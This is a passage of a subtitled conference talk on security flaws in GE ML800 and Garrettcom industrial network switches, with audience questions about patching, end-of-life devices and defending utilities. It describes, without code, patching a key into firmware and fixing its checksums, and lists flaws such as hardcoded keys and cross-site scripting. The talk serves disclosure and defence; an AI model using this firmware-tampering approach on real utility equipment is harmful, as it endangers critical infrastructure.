    what's going on but I don't know about
  • 31:56 - 31:59
    you. I kind of feel like if I buy a device
    that's supposed to be used for a safety
  • 31:59 - 32:03
    critical process I should be allowed to
    use SSH without having to call up the
  • 32:03 - 32:11
    vendor and get some special magic
    password. So considering I don't like that
  • 32:11 - 32:17
    approach. What if I patched my own key
    into the image right. I don't know the
  • 32:17 - 32:22
    password of their key but I know the
    password of a key I can generate. So I
  • 32:22 - 32:27
    just need to make sure it's roughly the
    right size and try and patch it in. Then
  • 32:27 - 32:30
    I've got some problems with compression
    because I've got to reverse the whole
  • 32:30 - 32:34
    process that I just described to you patch
    it into the larger binary. Will there be
  • 32:34 - 32:44
    any CRC or firmware signing? I don't know,
    right. So the uploaded image is not a
  • 32:44 - 32:51
    valid image for this device. That's
    correct: I messed with it. But I got this
  • 32:51 - 32:54
    error and it gave me a clue. It gave me a
    clue that I did indeed have some of my
  • 32:54 - 33:02
    CRCs wrong so when I altered the image
    again I got to this state. So you're
  • 33:02 - 33:06
    learning all the time by having a real
    device. Now some of my friends they do
  • 33:06 - 33:10
    static analysis and they don't buy these
    devices. I decided to buy this one. I
  • 33:10 - 33:16
    found one on eBay. It wasn't very
    expensive. I mean it depends on your range
  • 33:16 - 33:20
    for expensive. But if you're helping
    defend industrial systems I thought it was
  • 33:20 - 33:27
    worth the money. So I bought it and this
    enables me to try firmware images out and
  • 33:27 - 33:31
    I can slowly start to figure out what I
    need to patch on these firmware images to
  • 33:31 - 33:37
    do whatever I want. Luckily I just tried
    to patch mine to have SSH because I
  • 33:37 - 33:44
    thought people deserve to have SSH. So
    that's an Adler 32 up there on the left
  • 33:44 - 33:50
    and the other CRC is on the bottom so that
    Adler 32 and some adjustment of file
  • 33:50 - 33:54
    length although zeros in that line just
    above it eventually got me to the point
  • 33:54 - 34:00
    where it believes it's a corrupted binary.
    And then we have this CRC on the end that
  • 34:00 - 34:08
    we need to have a look at. Now I'm a big
    fan of suspense. I love suspense. I'm
  • 34:08 - 34:15
    going to leave that one is a cliffhanger
    and an exercise for you watching. So I
  • 34:15 - 34:18
    said I was going to talk about GE ML800
    but I'm also going to talk about
  • 34:18 - 34:21
    Garrettcom. Luckily it's not very
    difficult. Garrettcom is the original
  • 34:21 - 34:27
    equipment manufacturer for the GE ML800
    series. I noticed that because the
  • 34:27 - 34:31
    certificate I found attached to those
    private keys said Garrettcom in it and I
  • 34:31 - 34:36
    went and looked at their firmware images
    and they have similar CRC similar file
  • 34:36 - 34:40
    structures similar everything so I believe
    that they are affected by the cross site
  • 34:40 - 34:46
    scripting, the denial of service, and
    hardcoded keys. I understand from some
  • 34:46 - 34:51
    people that they have been in contact with
    GE to try and fix some of this stuff but
  • 34:51 - 34:58
    their response to GE was mainly "Sorry,
    this is the end of life on this device".
  • 34:58 - 35:03
    That's fine. I understand you're running a
    business but you're selling equipment to
  • 35:03 - 35:08
    people who manage utilities that we all
    depend on. If Sony goes bankrupt because
  • 35:08 - 35:14
    they get hacked that's one thing right.
    But you can't just dissolve a utility and
  • 35:14 - 35:19
    start again. As my friend Klaus points out
    regularly – fantastic insights into the
  • 35:19 - 35:23
    industrial system world, Klaus and Vanessa
    – you can't just dissolve the utility and
  • 35:23 - 35:26
    start again. You still have the same
    infrastructure you still have the same
  • 35:26 - 35:31
    workers. It doesn't work that way. You
    can't bail out utilities that we depend
  • 35:31 - 35:38
    on. So sorry. End of Life... I don't even
    understand why people buy these devices
  • 35:38 - 35:43
    and this code without code escrow. When
    you buy the code make sure you have the
  • 35:43 - 35:49
    code in perpetuity for these systems so
    that you can fix them when something like
  • 35:49 - 35:54
    this or something worse happens. If I'm
    your worst nightmare, you have real
  • 35:54 - 35:59
    problems because there are very dark
    people in the world actually damaging
  • 35:59 - 36:05
    furnaces in Germany. So me disclosing keys
    on stage is scary for you. You need to get
  • 36:05 - 36:13
    a grip. So, garrettcom?
    Here's your key too.
  • 36:13 - 36:20
    Applause
  • 36:20 - 36:26
    The strings come from the images.
    Developers are funny people really. I like
  • 36:26 - 36:32
    this. I just put them up because they're
    funny. Some people had some hard times, I
  • 36:32 - 36:36
    guess, writing some of this code. And my
    respect to them! They do great work but
  • 36:36 - 36:43
    you know, there's a couple of things we
    can improve on security in these devices.
  • 36:43 - 36:48
    So I once had the opportunity to stand in
    front of six different vendors at the same
  • 36:48 - 36:53
    time their computer emergency response
    teams at a conference and I said to them,
  • 36:53 - 37:00
    "Will any of you commit to an average
    patch time for vulnerabilities of three
  • 37:00 - 37:05
    months?" An average patch time, because it
    might take 8 months, as it so far has
  • 37:05 - 37:10
    taken in the case of GE and Garrettcom, to
    work on these issues. It might take a long
  • 37:10 - 37:15
    time in some cases but as an average patch
    time I think 3 months for things that we
  • 37:15 - 37:20
    all depend on is reasonable. So I asked
    these six different teams in the same
  • 37:20 - 37:29
    room. If any of them would commit to this
    and I heard silence for 30 seconds. So my
  • 37:29 - 37:35
    friend decided to call this the silence of
    the vendors right. And I think that's that
  • 37:35 - 37:42
    sums it up. I'd like to see better patch
    times. I'd like to see a computer
  • 37:42 - 37:45
    emergency response teams in each of these
    vendors and I'd like to see someone
  • 37:45 - 37:54
    responsible for security in each of these
    different utilities. I can dream, right? I
  • 37:54 - 37:57
    think that key management... the current
    practice industrial systems is to take
  • 37:57 - 38:03
    some insecure protocol and wrap it in SSL
    or TLS which is why we need the help of
  • 38:03 - 38:10
    you privacy people because TLS and SSL
    are not the be all and end all. They often
  • 38:10 - 38:16
    sort of go the wrong way, right. For
    example you can use TLS to do integrity
  • 38:16 - 38:21
    without encryption so you can verify that
    every message has reached its destination
  • 38:21 - 38:26
    intact but it is not encrypted. And this
    means that you can still do intrusion
  • 38:26 - 38:33
    detection analysis of the packets. That's
    really good. But nobody uses that in SSL
  • 38:33 - 38:37
    in other ways right. I'm a big fan of
    Shodan and use Shodan for a variety of
  • 38:37 - 38:41
    different things usually to get a sense of
    the Internet as a whole, right? Let me
  • 38:41 - 38:45
    back up a little bit. When I was at
    Cambridge I went to Darwin college and
  • 38:45 - 38:48
    because you're at Darwin college you read
    up a bit on Darwin and you think about how
  • 38:48 - 38:52
    Darwin thought and I think the Internet is
    kind of like that. When it was built by
  • 38:52 - 38:57
    the IETF and various people, who did
    fantastic work, they imagined it one way
  • 38:57 - 39:01
    and then we inherited it and it grew and
    it became an ecosystem and stuff happens
  • 39:01 - 39:05
    out there that you wouldn't expect. And so
    that's why I like Shodan. It's kind of
  • 39:05 - 39:10
    like being a natural scientist: what's a
    survey of the world, what kind of machines
  • 39:10 - 39:13
    are out there, what versions are they
    running, when do people update their SSL..
  • 39:13 - 39:18
    err, you know, their certificates do they
    do it before or after the certificate is
  • 39:18 - 39:23
    invalid. Do they always upgrade the
    algorithm. Do they increase the key size.
  • 39:23 - 39:26
    You know how do things change right you
    need to sort of study it as a whole and
  • 39:26 - 39:30
    that's my point when it comes to just
    taking SSL and slapping it over a
  • 39:30 - 39:38
    protocol. It's not quite that simple. So
    again we need your help. Where can we go
  • 39:38 - 39:42
    with these attacks. And you remember at
    the beginning I pointed out the underpants
  • 39:42 - 39:50
    gnome. The emperor wears no clothes.
    Altering switch configurations is a big
  • 39:50 - 39:57
    deal because you can exfiltrate process
    data. That gives you a map of the process
  • 39:57 - 40:02
    because industrial systems are bespoke.
    Each one of them is different. It does run
  • 40:02 - 40:07
    different traffic and we are lucky to work
    on security in this space because our
  • 40:07 - 40:11
    users are numerate and literate and they
    care about safety. They don't always
  • 40:11 - 40:14
    understand security but they do care about
    safety. So if you can make it a safety
  • 40:14 - 40:18
    concern they care. There are also
    engineers that many of these utilities who
  • 40:18 - 40:24
    look at the network 24/7. Not all of them
    but some of them. Can you imagine a home
  • 40:24 - 40:29
    network or something else with that kind
    of user base. We're lucky we should be
  • 40:29 - 40:35
    taking advantage of that user base. So
    getting back to the point you know denial
  • 40:35 - 40:39
    of service attacks to disrupt the process
    go and see Marmusha's talk. This will all
  • 40:39 - 40:43
    make a lot more sense when you go and see
    her talk. Basically any man in the middle
  • 40:43 - 40:48
    attack can disrupt alter or drop traffic
    at this point. If you can affect the
  • 40:48 - 40:52
    switches and the substation. And
    exfiltrating in the data gives you a map
  • 40:52 - 40:58
    of the process which leads towards further
    potential damage for the utilities. Now
  • 40:58 - 41:01
    it's not always that simple people will
    get up on stage and they will tell you I
  • 41:01 - 41:07
    am awesome and this is how it's done and
    it's easy to blow shit up. It's not true.
  • 41:07 - 41:10
    It takes a little bit of thought it takes
    a little bit of work. I am certainly not
  • 41:10 - 41:16
    awesome. I am just a quality assurance
    person from a former vendor. I just
  • 41:16 - 41:23
    decided to get into security and keep
    going with it. So you can't always perform
  • 41:23 - 41:25
    these man in the middle attacks. People
    will say you can. But the reason you can't
  • 41:25 - 41:31
    is real-time system constraints. Some
    systems will stop receiving traffic five
  • 41:31 - 41:35
    milliseconds or microseconds later and
    ignore anything. If a value doesn't arrive
  • 41:35 - 41:39
    in this time it doesn't care. So the idea
    that you can route the traffic out to some
  • 41:39 - 41:44
    other country and then back in and disrupt
    the process is bollocks. Sometimes you
  • 41:44 - 41:48
    have to alter the firmware to achieve
    that. That depends on the process but I'm
  • 41:48 - 41:53
    just trying to give you a sense of how
    performing actual attacks give you a sense
  • 41:53 - 41:56
    of what the limits are, what the
    logistical burdens are for the attacker
  • 41:56 - 42:05
    and that's important stuff for us to know.
    All right. Little bit of an overview.
  • 42:05 - 42:12
    Drunk session IDs. brute forcing
    MD5+NONCE, cross site request forgery for
  • 42:12 - 42:17
    firmware upload (of all things),
    reflected cross-site scripting (8 cases of
  • 42:17 - 42:23
    it) pre authentication denial of service,
    hardcoded keys times 2 in a firmware
  • 42:23 - 42:29
    image, SSL without forward secrecy, self
    signed certificates so there's no revoking
  • 42:29 - 42:32
    there's no managing of the keys on these
    devices right. Not to mention utility
  • 42:32 - 42:36
    workers are busy already. They may not
    have time to manage all of these devices
  • 42:36 - 42:40
    we might need to rethink that approach
    right. Clear text passwords under SSL
  • 42:40 - 42:44
    because well no one can break SSL unless
    you hard code the key in the firmware
  • 42:44 - 42:50
    that's downloadable from the internet.
    Enable ssh with a password and three
  • 42:50 - 42:55
    quarter of a year waiting for fixes for
    some of this stuff. I'm not happy with
  • 42:55 - 43:01
    that. I think that we could live in a much
    better, much safer world. And to do so we
  • 43:01 - 43:08
    need to talk very seriously about some of
    these issues. Don't take my opinion for
  • 43:08 - 43:12
    it. Listen to some other people. The best
    thing about doing industrial systems work
  • 43:12 - 43:15
    is the diversity of approach. You know I
    love that there are so many other people
  • 43:15 - 43:20
    doing SCADA and ICS. And I love that
    they're going different directions. So in
  • 43:20 - 43:26
    the future I plan to be on another stage
    with some friends and show you some more.
  • 43:26 - 43:30
    Thank you for listening mustache fans and
    as a parting thought. More tax money is
  • 43:30 - 43:35
    spent on surveillance than on
    defending common utilities.
  • 43:35 - 43:44
    Applaus
  • 43:44 - 43:51
    Herald: Thank you. It made me a scary
    Sunday morning. They got a utility *<<
  • 43:51 - 43:58
    guess, mostly incomprehensable* down the
    road. OK. We'll have some questions taken
  • 43:58 - 44:06
    please. As the session is recorded and
    streamed anything you say, say it into a
  • 44:06 - 44:17
    mic. Any questions up? Wow, it is Sunday
    morning.
  • 44:17 - 44:18
    Éireann: Number three, sure
  • 44:18 - 44:21
    Herald: everybody understood everything?
    You're kidding me.
  • 44:21 - 44:24
    Éireann: I've got one right here
    Herald: here is a question.
  • 44:24 - 44:30
    Question: Hey thanks I enjoyed your talk
    and I think it's very important to raise
  • 44:30 - 44:38
    awareness. But I think it's not to raise
    awareness. Not much in this community, but
  • 44:38 - 44:44
    within the engineering community and I see
    it a lot of times and many engineers
  • 44:44 - 44:50
    having lots of problems doing that for
    several reasons. There is maybe the
  • 44:50 - 44:55
    engineer who is thinking about this but
    has its miniatures in the back has to deal
  • 44:55 - 45:03
    with service personnel which know how to
    work a hammer and a screwdriver and on the
  • 45:03 - 45:11
    other side, engineers have to work with
    customers which more those lazy people.
  • 45:11 - 45:16
    And so that's how these things happen. And
    I think it's more important to raise
  • 45:16 - 45:22
    awareness of these kinds of things in the
    engineering community.
  • 45:22 - 45:25
    Éireann: So just to repeat a little bit
    for anybody else that couldn't hear it or
  • 45:25 - 45:29
    for the recording it's very important to
    work with the engineers some of the
  • 45:29 - 45:32
    engineers understand the problem. But
    typically management or lower level
  • 45:32 - 45:38
    service personnel don't always understand
    the problem. And it's not important to
  • 45:38 - 45:42
    raise the awareness in the hacker
    community. But more with the engineers is
  • 45:42 - 45:46
    what you were saying. Right. OK.
    Absolutely true. Completely agree with
  • 45:46 - 45:51
    you. I don't just come to these
    conferences and present to you guys. I go
  • 45:51 - 45:54
    and I present to the engineers too. And in
    fact a couple of engineers have come to
  • 45:54 - 45:59
    this conference because we did work at
    other conferences to see what the hacker
  • 45:59 - 46:02
    community is about and learn things from
    the hacker community because this is a
  • 46:02 - 46:05
    place where you can learn if you're just
    not afraid of getting pwned a couple of
  • 46:05 - 46:11
    times right. And it happens to me too
    right. I learned a lot from getting
  • 46:11 - 46:14
    compromised on my machine and watching
    someone do something. Anyways back to the
  • 46:14 - 46:18
    point I don't just work with engineers or
    hackers. I also work with C-level
  • 46:18 - 46:22
    executives so I'm on a sabbatical from
    IOActive at the moment. at the Cambridge
  • 46:22 - 46:26
    Center for Risk studies, and I'm working
    with the insurance people which has its
  • 46:26 - 46:31
    challenges shall we say. But some of them
    are very intelligent people and they want
  • 46:31 - 46:35
    to understand what's going on with hacking
    attacks and they want to approach this
  • 46:35 - 46:41
    from a slightly different angle. My stake
    in that is to be sure that when the
  • 46:41 - 46:45
    insurance people do get involved that they
    actually ask for fixes and improve stuff.
  • 46:45 - 46:50
    So yes I do my best to raise awareness
    wherever I can. And I'm not alone. You can
  • 46:50 - 46:54
    help me.
    Questioner: Thank you
  • 46:54 - 46:58
    applause
  • 46:58 - 47:06
    Herald: OK, there's another question here.
    Number two. Oh, and up there too, yes we
  • 47:06 - 47:09
    saw you. OK number two was first I think.
    Go ahead
  • 47:09 - 47:14
    Question: incomprehensible. So you
    mentioned a couple of things, err a couple
  • 47:14 - 47:18
    of vulnerabilities and I was wondering
    what you would think an ideal system would
  • 47:18 - 47:24
    look like. You mentioned key provisioning
    of course putting certificates. I assume
  • 47:24 - 47:28
    that they were different certificates for
    different devices rather than the same
  • 47:28 - 47:37
    certificate for all devices. Okay that's a bad
    thing. And and also sort of the way how
  • 47:37 - 47:45
    the software update management works. So
    how would you if you could give them some
  • 47:45 - 47:49
    advice how to design a system
    how would you do it?
  • 47:49 - 47:55
    Éireann: Okay. So first of all I wouldn't
    hard code the keys as you as you discussed
  • 47:55 - 48:02
    to be in every device the same. It's one
    thing to put in your documentation hey you
  • 48:02 - 48:08
    should update the keys but I mean if I can
    patch binary file with a key then there's
  • 48:08 - 48:11
    no reason you couldn't do that on the
    website where you download the firmware
  • 48:11 - 48:15
    image right. Just as an example as a
    thought experiment sort of makes that
  • 48:15 - 48:18
    clear. The upgrade path for these devices
    is download the firmware image from the
  • 48:18 - 48:25
    website to some machine and then carry it,
    because all these systems are airgapped.
  • 48:25 - 48:29
    to some other location and then upload it
    onto the switch right with hardcoded
  • 48:29 - 48:34
    credentials. So first off whenever you
    provision a switch initially you provision
  • 48:34 - 48:37
    all of the credentials for that device.
    That's standard practice of many routers
  • 48:37 - 48:42
    and other pieces of equipment today. And I
    would think less about defending and
  • 48:42 - 48:46
    securing the device than on being
    able to regularly check its integrity,
  • 48:46 - 48:49
    the integrity of the firmware that is
    running and the integrity of the
  • 48:49 - 48:54
    configuration. So I'd focus on that and I'd
    focus on being able to recover the switch
  • 48:54 - 48:58
    after it's been attacked. So you reverse
    your thinking. You assume that one day
  • 48:58 - 49:01
    someone is going to crack your firmware
    signing and crack this and crack that and
  • 49:01 - 49:06
    you focus on how can I quickly upload a
    new firmware image that is known to be
  • 49:06 - 49:12
    good and verify that the one that is
    uploaded is good to this device.
  • 49:12 - 49:16
    Questioner: Thank you.
    Herald: There was a question up there on
  • 49:16 - 49:19
    the balcony.
    Signal angel: Yes we have two questions
  • 49:19 - 49:26
    here on the net. So the first one is how
    would you solve the end of life issue.
  • 49:26 - 49:30
    Sometimes incomprehensible clients just
    gets really outdated.
  • 49:30 - 49:33
    Éireann: That's absolutely true and it is
    slightly unfair of me to be a hard on the
  • 49:33 - 49:38
    vendors. But it's my job to take the
    debate a little bit too far the other way.
  • 49:38 - 49:43
    So how would I solve the end of life issue
    is the question from the internet. I don't
  • 49:43 - 49:48
    know. I think that's not a technical
    problem it's a societal problem. Like when
  • 49:48 - 49:56
    we buy bridges they are bridges until they
    fall down. When we buy roads they stay
  • 49:56 - 49:59
    there until they go away. I mean there is
    probably some end of life issues in there
  • 49:59 - 50:05
    but it's almost more of a contractual
    legal issue and someone should study that.
  • 50:05 - 50:08
    There are people studying that but it's
    not my area of expertise but I'll try and
  • 50:08 - 50:13
    answer as best I can. I think code escrow
    is a good way to go when you buy some of
  • 50:13 - 50:18
    these devices you say I want the code for
    this device in the future. I want to have
  • 50:18 - 50:22
    access to it. If your company goes
    bankrupt I need you to give up the source
  • 50:22 - 50:26
    code for these devices when you go
    bankrupt or when you disappear or when
  • 50:26 - 50:30
    it's the end of life. There are a couple
    of manufacturers out there doing open
  • 50:30 - 50:35
    source switches. There's a company called
    Open gear who are awesome. They gave me a
  • 50:35 - 50:40
    switch to play with that I haven't had
    time to look at yet. I think that's amazing
  • 50:40 - 50:43
    right. And their code is open source and
    you can go and examine it. So you would
  • 50:43 - 50:46
    have the code anyway. Those are two
    different approaches. I think there are
  • 50:46 - 50:50
    others you can solve this problem
    technically or legally or socially but as
  • 50:50 - 50:56
    a society we depend on these utilities and
    that code should not just vanish when it's
  • 50:56 - 51:05
    difficult or costly to keep it upgraded.
    applause
  • 51:05 - 51:08
    Herald: There was a second
    question from the Internet.
  • 51:08 - 51:14
    Signal angel: Yes, so the second one is:
    what should a non-technical person in
  • 51:14 - 51:20
    the respect of incomprehensible set non-
    technical person sent to manage small town
  • 51:20 - 51:25
    utility do as best practice?
    Éireann: I think the first and most
  • 51:25 - 51:30
    important thing is to look for attacks.
    I'm sorry I should probably repeat that
  • 51:30 - 51:34
    question just to be sure. What should
    someone in a small town who manages
  • 51:34 - 51:37
    utility do to defend themselves and
    protect himself. So the first thing is
  • 51:37 - 51:43
    look for attacks. Even if you spend a few
    hours a week looking for something you
  • 51:43 - 51:46
    script something up or you hire some
    college kid to come in and script
  • 51:46 - 51:50
    something and look for things on your
    network and ask questions and yes they're
  • 51:50 - 51:52
    going to be a pain in the ass and is going
    to be difficult. But you're going to learn
  • 51:52 - 51:56
    things about your network and you might
    detect some attacks. The first problem in
  • 51:56 - 52:01
    utilities is no one is responsible for
    security. It's not my job. It's kind of
  • 52:01 - 52:05
    the mantra so for a small utility find
    someone whose job it is if you're a very
  • 52:05 - 52:09
    small utility there's probably some other
    small utilities near you and you can hire
  • 52:09 - 52:14
    a resource together to come and visit your
    different utilities and help you out. The
  • 52:14 - 52:17
    second one is watch your relationship with
    your vendor when you purchase this
  • 52:17 - 52:21
    equipment you spend a lot of money on it.
    Spend a little bit of time doing
  • 52:21 - 52:25
    penetration tests. Yes I like it when you
    hire me but you don't have to hire me.
  • 52:25 - 52:28
    There are plenty of other people you can
    hire who will have a look at the device
  • 52:28 - 52:32
    and find the simple vulnerabilities. So
    when you purchase something make sure you
  • 52:32 - 52:35
    test it for security purposes and that's
    very important because you can even put
  • 52:35 - 52:41
    into your contract if you fail the
    security tests we will pay you less money.
  • 52:41 - 52:44
    And the vendors are not going to react
    to security until you do that. So that's
  • 52:44 - 52:51
    the second answer. And I wish I had a
    third to make it very neat but I don't.
  • 52:51 - 52:56
    Herald: OK. There was one more
    question at mic 4 I think
  • 52:56 - 52:58
    Questioner: Yes hi thank you for
    your time.
  • 52:58 - 53:04
    Herald: Talk into the mike please. Thank
    you for your talk. Q Hi. I'm kind of a
  • 53:04 - 53:13
    newbie to the C3 community and I am not
    sure about the question I want to ask you.
  • 53:13 - 53:17
    Probably many people understand in this
    room but I don't know if I would like to
  • 53:17 - 53:24
    ask you what exactly do you
    mean by arbitrary firmware.
  • 53:24 - 53:29
    Éireann: No problem. So the question was
    What do you mean by arbitrary firmware. I
  • 53:29 - 53:34
    mean the firmware that I have altered that
    was not manufactured by the vendor to do
  • 53:34 - 53:39
    whatever I want. How do you trust that
    this switch sends all the packets that it
  • 53:39 - 53:45
    should send. What if it's, you know, my
    handle is BSB right. What if it drops
  • 53:45 - 53:51
    every packet that has BSB in the packet.
    Right. You can rewrite a firmware image to
  • 53:51 - 53:55
    do whatever the device can do and in some
    cases more things than the device usually
  • 53:55 - 54:00
    does to damage itself for example. So an
    arbitrary firmware is one in which anyone
  • 54:00 - 54:03
    writes the firmware and there is no
    checking to be sure that this is the image
  • 54:03 - 54:08
    that you want on this device whether it's
    provided by the vendor or the community
  • 54:08 - 54:13
    right. You still want checking that this
    is the correct code or the code that you
  • 54:13 - 54:18
    wanted anyway. Right.
    Herald: Okay thank you. Is that a question
  • 54:18 - 54:22
    here mic 1? OK go ahead.
    Questioner: Yes please. In your
  • 54:22 - 54:30
    hypothetical question, you asked what
    damage could I do in that paint factory.
  • 54:30 - 54:40
    But you can also reverse it. What kind of
    company secrets can I obtain for example,
  • 54:40 - 54:46
    your favorite recipe for your hot
    chocolate or the recipes of Coca-Cola.
  • 54:46 - 54:53
    They are vulnerable as well aren't they.
    Éireann: Yes. So the question just again
  • 54:53 - 54:57
    for everyone else. You don't just have to
    talk about damage in a paint factory or
  • 54:57 - 55:02
    any industrial system. You can also talk
    about intellectual property and protecting
  • 55:02 - 55:07
    the recipes that we use to bake cookies or
    make beer or whatever pharmaceuticals
  • 55:07 - 55:13
    whatever. And that's a fantastic question
    and I'm glad you brought it up a couple of
  • 55:13 - 55:16
    years ago when I was doing... well, more
    than a couple of years like eight years
  • 55:16 - 55:19
    ago, when I was doing industrial system
    security I realized I wasn't getting a lot
  • 55:19 - 55:23
    of traction. It was before stuxnet, I was
    a quality assurance guy. Everybody thought
  • 55:23 - 55:34
    I was fucking crazy right. Stuxnet,
    career. It's wrong. It's really wrong. But
  • 55:34 - 55:40
    the point is I tried to take that
    approach. I tried to say you have a
  • 55:40 - 55:43
    process in which you manufacture something
    and you make money by the fact that that
  • 55:43 - 55:48
    process is relatively secret and if you
    don't care about defending your workers
  • 55:48 - 55:53
    from being damaged then at least care
    about the intellectual property because
  • 55:53 - 55:56
    I'll get security in by some sort of back
    door right. I'm a little bit of a security
  • 55:56 - 56:00
    Machiavellian. I'll find a way to get
    security into the system somehow. So I
  • 56:00 - 56:05
    tried to say intellectual property you
    should be protected. And I found that they
  • 56:05 - 56:09
    didn't care so much. I mean maybe you'll
    have more luck maybe post-stuxnet that
  • 56:09 - 56:14
    that's a better argument. I hope you do.
    But it is an important question as well.
  • 56:14 - 56:19
    Right. It's not, it's not just potential
    for damage. I think there's a lot more
  • 56:19 - 56:25
    espionage going on on these networks than
    there is damage and sabotage. Herald: Okay
  • 56:25 - 56:32
    we'll take one more question on mike four.
    Questioner: Thank you okay. My question
  • 56:32 - 56:38
    concerns the concepts of software defined
    networking and open flow. So when I first
  • 56:38 - 56:45
    heard about software defined networking I
    thought well this is a huge security issue
  • 56:45 - 56:51
    and there may be huge vulnerabilities.
    After your joke I think this might
  • 56:51 - 56:56
    actually be a good idea to dumb down the
    switches and put the intelligence
  • 56:56 - 57:02
    somewhere locked up in a safe place.
    What's your opinion on that. Can they
  • 57:02 - 57:06
    actually improve security.
    Éireann: Yes. So the question is what role
  • 57:06 - 57:10
    could software defined networking play in
    these sorts of environments. And is it a
  • 57:10 - 57:15
    good idea from a security perspective.
    Anytime someone has a revolution in
  • 57:15 - 57:19
    computing we also have to update our
    security paradigm. So I think with
  • 57:19 - 57:23
    software defined networking it's not
    whether it's good or bad it's that you
  • 57:23 - 57:28
    defend that network differently than you
    defend one of these networks. So it's not
  • 57:28 - 57:31
    so much that as good as good or bad it's
    neutral if you know how to defend your
  • 57:31 - 57:35
    network. I don't care what it is. As long
    as someone is looking to defend it and
  • 57:35 - 57:39
    cares about how the flows are working. So
    I think software defined networking in
  • 57:39 - 57:42
    these environments could be a very good
    thing but the refresh rate on these
  • 57:42 - 57:46
    devices is not that high. So I don't think
    we'll see it there for a little while even
  • 57:46 - 57:51
    though it might be a good thing
    philosophically. It takes 5 10 15 20 years
  • 57:51 - 57:56
    to refresh these networks so it'll be a little
    while. But it's not good or bad. It's just
  • 57:56 - 58:00
    learn to defend what you got is the
    problem right.
  • 58:00 - 58:06
    Questioner: Okay thanks a lot.
    Herald: Okay okay let's give a big hand
  • 58:06 - 58:10
    for Éireann and thank you.
    Éireann: Thank you
  • 58:10 - 58:13
    applause
  • 58:13 - 58:24
    subtitles created by c3subtitles.de
    Join, and help us!
Title:
Eireann Leverett: Switches Get Stitches
Description:

more » « less
Video Language:
English
Duration:
58:24

English subtitles

Revisions